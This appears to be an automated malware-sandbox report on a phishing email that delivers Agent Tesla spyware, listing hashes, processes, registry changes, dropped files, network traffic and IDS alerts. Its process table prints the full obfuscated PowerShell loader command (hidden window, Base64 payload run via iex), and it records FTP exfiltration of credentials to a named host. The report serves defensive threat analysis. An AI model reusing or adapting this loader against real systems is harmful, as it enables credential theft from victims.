| File name: | AW_ Order n°96868421.eml |
| Full analysis: | https://app.any.run/tasks/33314560-7383-445c-b9a9-f3f3b9be057c |
| Verdict: | Malicious activity |
| Threats: | Agent Tesla is spyware that collects information about the actions of its victims by recording keystrokes and user interactions. It is falsely marketed as a legitimate software on the dedicated website where this malware is sold. |
| Analysis date: | October 03, 2025, 16:39:37 |
| OS: | Windows 7 Professional Service Pack 1 (build: 7601, 32 bit) |
| Tags: | |
| Indicators: | |
| MIME: | message/rfc822 |
| File info: | RFC 822 mail, ASCII text, with CRLF line terminators |
| MD5: | FEF58D78E1B626D3116D7099D5A78584 |
| SHA1: | 7FB63F76A399F69DF23276C43A064C0205300318 |
| SHA256: | 8E69BF0C0CC6FAAFB637A2C3BA9F8BB62A262728A44B7DDF1339AC50F886E103 |
| SSDEEP: | 12288:HMPf40is5/PAl3HRlRqsyTYVhL50bjP2ZPw+Y+KZ:HWf40is5/PAl3HResmYVhiHPGwg0 |
| .eml | | | E-Mail message (Var. 5) (100) |
|---|
PID | CMD | Path | Indicators | Parent process | |||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
| 1348 | C:\Windows\system32\cmd.exe /c ""C:\Users\admin\AppData\Local\Temp\Rar$DIa3136.24627\Order nø96868421 xls.bat" " | C:\Windows\System32\cmd.exe | — | WinRAR.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Command Processor Exit code: 0 Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850) Modules
| |||||||||||||||
| 2708 | "C:\PROGRA~1\MICROS~1\Office14\OUTLOOK.EXE" /eml "C:\Users\admin\AppData\Local\Temp\AW_ Order n°96868421.eml" | C:\Program Files\Microsoft Office\Office14\OUTLOOK.EXE | explorer.exe | ||||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft Outlook Version: 14.0.6025.1000 Modules
| |||||||||||||||
| 2792 | ""C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"" -nop -w h -c ""iex([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String(('CgAkAGIAYQBuAGEAbgBhAD0AIgAkAGUAbgBrbgdxynufc2ADoAVQBTAEUAUgBQAFIATwBGAEkATABFAFrbgdxynufcwAYQBvAGMALgBiAGEAdAAiADsAaQBmACgAVrbgdxynufcABlAHMAdAAtAFAAYQB0AGgAIAAkAGIAYQBurbgdxynufcAGEAbgBhACkAewAkAHIAYQB3AEwAaQBuAGUrbgdxynufcAcwA9AGcAYwAgACQAYgBhAG4AYQBuAGEAfArbgdxynufcA/AHsAJABfACAALQBsAGkAawBlACAAIgA6ArbgdxynufcDoAOgAqACIAfQA7ACQAcABhAHIAdAAxAD0ArbgdxynufcKAAkAHIAYQB3AEwAaQBuAGUAcwB8AD8AewArbgdxynufckAF8AIAAtAGwAaQBrAGUAIAAiADoAOgA6ADrbgdxynufcEAKgAiAH0AfAAlAHsAJABfAC4AUwB1AGIAcrbgdxynufcwB0AHIAaQBuAGcAKAA0ACkAfQApADsAJABwrbgdxynufcAGEAcgB0ADIAPQAoACQAcgBhAHcATABpAG4rbgdxynufcAZQBzAHwAPwB7ACQAXwAgAC0AbABpAGsAZQrbgdxynufcAgACIAOgA6ADoAMgAqACIAfQB8ACUAewAkArbgdxynufcF8ALgBTAHUAYgBzAHQAcgBpAG4AZwAoADQArbgdxynufcKQB9ACkAOwAkAHAAYQByAHQAMwA9ACgAJABrbgdxynufcyAGEAdwBMAGkAbgBlAHMAfAA/AHsAJABfACrbgdxynufcAALQBsAGkAawBlACAAIgA6ADoAOgAzACoAIrbgdxynufcgB9AHwAJQB7ACQAXwAuAFMAdQBiAHMAdAByrbgdxynufcAGkAbgBnACgANAApAH0AKQA7ACQAawBpAHcrbgdxynufcAaQA9ACQAcABhAHIAdAAxACsAJABwAGEAcgrbgdxynufcB0ADIAKwAkAHAAYQByAHQAMwA7ACQAYQBwArbgdxynufcHAAbABlAD0AKAAkAGsAaQB3AGkALQByAGUArbgdxynufccABsAGEAYwBlACIAWwB+ACMAQABdACIALAArbgdxynufciACIALQByAGUAcABsAGEAYwBlACIAbABqAHrbgdxynufcAAaQB5AHAAegBsAGYAYwBtAG0AagB0AHAAIrbgdxynufcgAsACIAIgApADsAaQBmACgAJABhAHAAcABsrbgdxynufcAGUAKQB7AHQAcgB5AHsAaQBlAHgAKABbAFQrbgdxynufcAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQrbgdxynufcA6ADoAVQBuAGkAYwBvAGQAZQAuAEcAZQB0ArbgdxynufcFMAdAByAGkAbgBnACgAWwBDAG8AbgB2AGUArbgdxynufccgB0AF0AOgA6AEYAcgBvAG0AQgBhAHMAZQArbgdxynufc2ADQAUwB0AHIAaQBuAGcAKAAkAGEAcABwAGrbgdxynufcwAZQApACkAKQB9AGMAYQB0AGMAaAB7AH0AfrbgdxynufcQB9AAoAJABvAHIAYQBuAGcAZQA9ACcASAA0rbgdxynufcAHMASQBBAEEAQQBBAEEAQQBBAEUAQQBKAFYrbgdxynufcAVQBhADAALwBiAE0AQgBUADkASwB4AGIASwrbgdxynufcAxAEcAUgAwAEgAZwBQAEUAcABsAGIANQAwArbgdxynufcEkAWQBDAEgAYQAvAFMAbABDAEcAdABvAE0ArbgdxynufcbABKAGIAaAB0AFQAeAB3ADYAMgArADAAZwBrbgdxynufcuAC8AdgB1AGMAcABDADgASwBHAGwAcwArAFrbgdxynufcIATQBuADEATwBlAGQAZQBuADMAdAB0AEsAerbgdxynufcABzAE0AQQBvADUAYwBaAEEARwBmADEARwA3rbgdxynufcADkAVgB2AGUAcQBjAGQAbQBxAFcAKwBQAHcrbgdxynufcATQBSAHEAWgA4AEkANQBYAHUANwA5AFYASQrbgdxynufcBOAFcAOQBWAFMARAB2AGkAUQBoAHgAUQBQArbgdxynufcFIATwBmAFQARABtAG8AYQBhAEMASQB6ADcArbgdxynufcagBqADcAYQBWAEUAawBtAFMAWAB4AE0AaQBrbgdxynufcuAGQALwBJAFAAQgBZAEIAbABmACsANQBmAFrbgdxynufcQAOQBUAEcAaABMAHMAUQB6AGkAVwBWAEcAZrbgdxynufcgBZAGsAMQBtAHEAeABWAEMAUwBOAE0ANQB3rbgdxynufcAEEAOQBSAEQAcgBlAFoASgBJAEIAcABzAHArbgdxynufcANwA3AEoAeABKAGMAaQBnAG4AZgBvAEgAawrbgdxynufcAxAGoAawBEAGsAdwBWADIAbAA2AEwAdwBVArbgdxynufcDYASgBJAG8AbwBIADcANgBqAHMAVQBBAHQArbgdxynufcUgBEAHIAbgBuAHYALwAxAHAAYwB3ADUAWgBrbgdxynufcDAHMASgBUAC8AQQBKAFMARwAyAEEASgAxAErbgdxynufckAawBUAGEATABnADYATgBEAFgAMAB2AEQAdrbgdxynufcAB5AHUASABuADcANgAxAGQAZQBwAEIAMAB6rbgdxynufcAHUAWgBIAFgAdQBmAHMAKwBsAHkATwByAG0rbgdxynufcAKwBDADgAWAA0AEUAcwBEAHYAegBtADgAZgrbgdxynufcBOAGwATQBYADcARQBzADcAdgBtAHEARgBiArbgdxynufcDIAZABwAHIAKwA4AGMALwBwAFoAagA3AHgArbgdxynufcNwBmAEQANABDAGkASwBOAFcAKwBjAGYAcABrbgdxynufc2AEMASQBRAE8AZgAzAGIAZwByAHUAUQBqAErbgdxynufcMAWQBtAHUAeQBzAEgANgBsAFgAdgBwADcAdrbgdxynufcgBGAHgAYwBHAGkAMQBCAGoAeQBVAHYAbwBTrbgdxynufcACsAWQB1AEMAYwBKAFYAdwBNAGgAawB4AFArbgdxynufcASwBDAFcAcwB5AEUAWQA0ADIATwBsAHgARgrbgdxynufcBlADEAVwAwAC8AcwBVAFgAdwBJAGMANgBmArbgdxynufcHEAcwBFAGYARQB4AFYASwB0AFMAcgAxAG0ArbgdxynufcNgBGADEANABYAFUAbgAxAGQAagBSAFoALwBrbgdxynufcpAFcAZgBCADYAcgBzAEoAaABEAEQAUAAzAErbgdxynufcMAcQBhAGYAcgBvAE4ASABDAEQAVgBhADIATrbgdxynufcgBhACsAeABwAGUAUQBDAEoAawBaAHIANABBrbgdxynufcAGsAZABuAFcARABXAFcAWgBKAGsAbABEAHErbgdxynufcAOQA1AGsAbABPAEoAdABPAHEASABvAGIANwrbgdxynufcBJAGsAawBsAGEAQwBVAEsAUgBLAGYALwBxArbgdxynufcFQAcABJAG0ARgBaAFcAUgBYADEAdAB5AEEArbgdxynufcYgAzADQAcwBaAE0ANAAxAFkAeABKAHkATgBrbgdxynufcaAEEAYQBZAFoAagAxAGgAbAAzAFcAKwBXAErbgdxynufc4AbQB5AHEAMABpADAASABTAHgAWQBiAHcAZrbgdxynufcAA3AG8AaQBFAGwAeQBVAHgAdwA3AFcANAB5rbgdxynufcAEcARQA4ADMAVwAxAHAAKwA3AG0AOABZAEgrbgdxynufcAYwAzAFoAYgBMAHEAYQB5AGkANABNAEcAQgrbgdxynufcBSAFUAMwBGAEEASwBrAG8AQgBsAFoAaQBjArbgdxynufcFgAZwBrAFIAMgBQADgAZwAwADkAQgA4AGUArbgdxynufcWABoAG4ATwArAEMAeQBrAGIAaQBtAEUAVwArbgdxynufcxAHoATAByAEMATQBvADEAeAB1AEwAdQBNADrbgdxynufcAAbgBZAGcAUwAyAHgAYwBlAE0ATABXAGUAcrbgdxynufcQBMAEsATAArAGIATQBWAEMAYQBYAHoAYgB4rbgdxynufcAGwAMAB5AE4AZQA4ADcAeQBpAE0AeAA3AFYrbgdxynufcASABOAEkATAArAHUAaQBnAHUAcQBiAGsAMwrbgdxynufcBVADAAMgBTACsAcQB0AEoAWQBmADAASgBaArbgdxynufcDcAbgBFAFgAUwBOAFIAZwByAEEAYwB6AGIArbgdxynufcWgBkAFkAQgAvAHMAcABvADkAcgB1AHQALwBrbgdxynufcpAEUAUwBzAEUAVAA0AFAAawBoAE0AeQAyACrbgdxynufcsAbwBCAHkAYwB1AGgAbAAzAEkARwBHAE0AYrbgdxynufcgBJAHQAcABFAGsANABSADUAYQBoAFUAZAAxrbgdxynufcAEIAaABDAEIAMABzAGwANwBDAHYAaQBkAFQrbgdxynufcAcQBqAHUAcgBZAHIAdABSAHEAcQBPAEkANArbgdxynufcBPAGEAQgBBAGwAYgBiAFAAZQBEAGgAMwBsArbgdxynufcCsAQgB4AG8ATQByAGoAZQAxAEQANgBrAGoArbgdxynufcKwBCAHkAVABVAHEALwBwADcATgBQAGcAYwBrbgdxynufc4AGQAZgBzAGwASwBQAGUAeABvAEMAKwBxAHrbgdxynufcIAZAB5AGIAcwAyADAATgBRAFcAdgBoAEYAarbgdxynufcQBjAEMAMgBmAGwAOQBpACsAegArAFgAKwA2rbgdxynufcAEoAUQByAEcALwA5ACsAQQA0AGgAaQB1AEQrbgdxynufcATgBQADUAZgA2AHAAZQBDAG0AcwA4AEkASwrbgdxynufcBuAE8AagBvAGsATwBMAFMASwA2AEkANwBPArbgdxynufcHEANgBZAG0AUgBYAFAAbgB3ADAATAB0AFQArbgdxynufcLwBBAEwARABJAG4AdgBGAE8AQgBnAEEAQQArbgdxynufcnADsAJABtAGEAbgBnAG8APQBbAEMAbwBuAHrbgdxynufcYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcrbgdxynufcwBlADYANABTAHQAcgBpAG4AZwAoACQAbwByrbgdxynufcAGEAbgBnAGUAKQA7ACQAcABpAG4AZQBhAHArbgdxynufcAcABsAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwrbgdxynufcB0ACAASQBPAC4ATQBlAG0AbwByAHkAUwB0ArbgdxynufcHIAZQBhAG0AKAAsACQAbQBhAG4AZwBvACkArbgdxynufcOwBpAGUAeAAoAE4AZQB3AC0ATwBiAGoAZQBrbgdxynufcjAHQAIABJAE8ALgBTAHQAcgBlAGEAbQBSAGrbgdxynufcUAYQBkAGUAcgAoAE4AZQB3AC0ATwBiAGoAZrbgdxynufcQBjAHQAIABJAE8ALgBDAG8AbQBwAHIAZQBzrbgdxynufcAHMAaQBvAG4ALgBHAFoAaQBwAFMAdAByAGUrbgdxynufcAYQBtACgAJABwAGkAbgBlAGEAcABwAGwAZQrbgdxynufcAsAFsASQBPAC4AQwBvAG0AcAByAGUAcwBzArbgdxynufcGkAbwBuAC4AQwBvAG0AcAByAGUAcwBzAGkArbgdxynufcbwBuAE0AbwBkAGUAXQA6ADoARABlAGMAbwBrbgdxynufctAHAAcgBlAHMAcwApACkAKQAuAFIAZQBhAGrbgdxynufcQAVABvAEUAbgBkACgAKQAKAA=='.Replace('rbgdxynufc','')))))"" | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | cmd.exe | ||||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows PowerShell Version: 10.0.14409.1005 (rs1_srvoob.161208-1155) Modules
| |||||||||||||||
| 3060 | C:\Windows\system32\cmd.exe /K "C:\Users\admin\AppData\Local\Temp\Rar$DIa3136.24627\Order nø96868421 xls.bat" | C:\Windows\System32\cmd.exe | — | cmd.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Command Processor Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850) Modules
| |||||||||||||||
| 3136 | "C:\Program Files\WinRAR\WinRAR.exe" "C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Outlook\MJK9L0MD\Order n96868421 xls.tar" | C:\Program Files\WinRAR\WinRAR.exe | — | OUTLOOK.EXE | |||||||||||
User: admin Company: Alexander Roshal Integrity Level: MEDIUM Description: WinRAR archiver Version: 5.91.0 Modules
| |||||||||||||||
| 3236 | cmd /c start "" /min "C:\Users\admin\AppData\Local\Temp\Rar$DIa3136.24627\Order nø96868421 xls.bat" | C:\Windows\System32\cmd.exe | — | cmd.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Command Processor Exit code: 0 Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850) Modules
| |||||||||||||||
| (PID) Process: | (2708) OUTLOOK.EXE | Key: | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109D30000000000000000F01FEC\Usage |
| Operation: | write | Name: | WORDFiles |
Value: | |||
| (PID) Process: | (2708) OUTLOOK.EXE | Key: | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109D30000000000000000F01FEC\Usage |
| Operation: | write | Name: | ProductFiles |
Value: | |||
| (PID) Process: | (2708) OUTLOOK.EXE | Key: | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109F10021400000000000F01FEC\Usage |
| Operation: | write | Name: | StemmerFiles_1042 |
Value: | |||
| (PID) Process: | (2708) OUTLOOK.EXE | Key: | HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Outlook\Resiliency\StartupItems |
| Operation: | delete value | Name: | *>* |
Value: 㸪*ઔ | |||
| (PID) Process: | (2708) OUTLOOK.EXE | Key: | HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Outlook\Resiliency\StartupItems |
| Operation: | delete value | Name: | g;* |
Value: 㭧*ઔ | |||
| (PID) Process: | (2708) OUTLOOK.EXE | Key: | HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Outlook\Resiliency\StartupItems |
| Operation: | delete key | Name: | (default) |
Value: | |||
| (PID) Process: | (2708) OUTLOOK.EXE | Key: | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap |
| Operation: | write | Name: | ProxyBypass |
Value: 1 | |||
| (PID) Process: | (2708) OUTLOOK.EXE | Key: | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap |
| Operation: | write | Name: | IntranetName |
Value: 1 | |||
| (PID) Process: | (2708) OUTLOOK.EXE | Key: | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap |
| Operation: | write | Name: | UNCAsIntranet |
Value: 1 | |||
| (PID) Process: | (2708) OUTLOOK.EXE | Key: | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap |
| Operation: | write | Name: | AutoDetect |
Value: 0 | |||
PID | Process | Filename | Type | |
|---|---|---|---|---|
| 2708 | OUTLOOK.EXE | C:\Users\admin\AppData\Local\Temp\CVRA3D7.tmp.cvr | — | |
MD5:— | SHA256:— | |||
| 2708 | OUTLOOK.EXE | C:\Users\admin\Documents\Outlook Files\Outlook Data File - NoMail.pst | — | |
MD5:— | SHA256:— | |||
| 2708 | OUTLOOK.EXE | C:\Users\admin\AppData\Roaming\Microsoft\Templates\~$rmalEmail.dotm | binary | |
MD5:B648E676A8B33F1BDC736B161009ACEF | SHA256:CEFCC8B706C601FFE25C6C06B17A0FE295AF6EEE84454218DE30F0076A4ECE5F | |||
| 2708 | OUTLOOK.EXE | C:\Users\admin\AppData\Local\Microsoft\Outlook\mapisvc.inf | text | |
MD5:F3B25701FE362EC84616A93A45CE9998 | SHA256:B3D510EF04275CA8E698E5B3CBB0ECE3949EF9252F0CDC839E9EE347409A2209 | |||
| 2708 | OUTLOOK.EXE | C:\Users\admin\AppData\Local\Temp\tmpA4F1.tmp | text | |
MD5:A03A1A57C95C1363DBA450776EBC6D46 | SHA256:9A6AFCF6F47849C595752AC363BBDE10D2816D76791F75147BBB5148E9CEDBDE | |||
| 2708 | OUTLOOK.EXE | C:\Users\admin\AppData\Local\Temp\StructuredQuery.log | text | |
MD5:717C04815E38C4A0955C21CC1F0AB3DD | SHA256:7E1CD4B6015D98A0591A2F7BFD19BD4BF545F2E16828D9D6578BE8C4288F7830 | |||
| 2708 | OUTLOOK.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\{4B715911-E7DE-4605-A98F-3A0BFC0FAAE3}\{1C306CB1-771E-4B4B-A902-86E897877F5B}.png | image | |
MD5:4C61C12EDBC453D7AE184976E95258E1 | SHA256:296526F9A716C1AA91BA5D6F69F0EB92FDF79C2CB2CFCF0CEB22B7CCBC27035F | |||
| 2708 | OUTLOOK.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Outlook\MJK9L0MD\Order n96868421 xls (2).tar | compressed | |
MD5:0D3191B8754510DEC48415736B08519A | SHA256:2F06F0387773CF2F858E5634AB3597C8AD5085C9CA4FA8976F84D259EAAEE7C0 | |||
| 2708 | OUTLOOK.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Outlook\MJK9L0MD\Order n96868421 xls.tar | compressed | |
MD5:F47E7E715AF7F9A3DD4280DD91570A9D | SHA256:440A0806F8E618D11BA338A73E3FBBBB7D5B7E473F37C2E0A075C3B792CDB0C3 | |||
| 2708 | OUTLOOK.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Outlook\MJK9L0MD\Order n96868421 xls.tar:Zone.Identifier | text | |
MD5:FBCCF14D504B7B2DBCB5A5BDA75BD93B | SHA256:EACD09517CE90D34BA562171D15AC40D302F0E691B439F91BE1B6406E25F5913 | |||
PID | Process | IP | Domain | ASN | CN | Reputation |
|---|---|---|---|---|---|---|
4 | System | 192.168.100.255:137 | — | — | — | whitelisted |
— | — | 224.0.0.252:5355 | — | — | — | whitelisted |
4 | System | 192.168.100.255:138 | — | — | — | whitelisted |
1076 | svchost.exe | 224.0.0.252:5355 | — | — | — | whitelisted |
2708 | OUTLOOK.EXE | 64.4.26.155:80 | config.messenger.msn.com | MICROSOFT-CORP-MSN-AS-BLOCK | US | whitelisted |
2792 | powershell.exe | 104.26.12.205:443 | api.ipify.org | CLOUDFLARENET | US | whitelisted |
2792 | powershell.exe | 192.185.13.234:21 | ftp.concaribe.com | UNIFIEDLAYER-AS-1 | US | malicious |
2792 | powershell.exe | 192.185.13.234:44601 | ftp.concaribe.com | UNIFIEDLAYER-AS-1 | US | unknown |
Domain | IP | Reputation |
|---|---|---|
google.com |
| whitelisted |
config.messenger.msn.com |
| whitelisted |
dns.msftncsi.com |
| whitelisted |
api.ipify.org |
| whitelisted |
ftp.concaribe.com |
| unknown |
PID | Process | Class | Message |
|---|---|---|---|
1076 | svchost.exe | Misc activity | ET INFO External IP Lookup Domain (ipify .org) in DNS Lookup |
2792 | powershell.exe | Misc activity | ET INFO External IP Address Lookup Domain (ipify .org) in TLS SNI |
— | — | Device Retrieving External IP Address Detected | ET INFO External IP Lookup api.ipify.org |
— | — | Device Retrieving External IP Address Detected | POLICY [ANY.RUN] External IP Lookup by HTTP (api .ipify .org) |
2792 | powershell.exe | A Network Trojan was detected | ET MALWARE Agent Tesla CnC Exfil via TCP |
2792 | powershell.exe | Successful Credential Theft Detected | STEALER [ANY.RUN] Clear Text Login Exfiltration Atempt |
2792 | powershell.exe | Successful Credential Theft Detected | STEALER [ANY.RUN] Clear Text Password Exfiltration Atempt |
2792 | powershell.exe | A Network Trojan was detected | STEALER [ANY.RUN] AgentTesla Exfiltration (raw TCP) |
2792 | powershell.exe | A Network Trojan was detected | STEALER [ANY.RUN] AgentTesla Exfiltration (raw TCP) |
2792 | powershell.exe | Misc activity | INFO [ANY.RUN] FTP protocol command for uploading a file |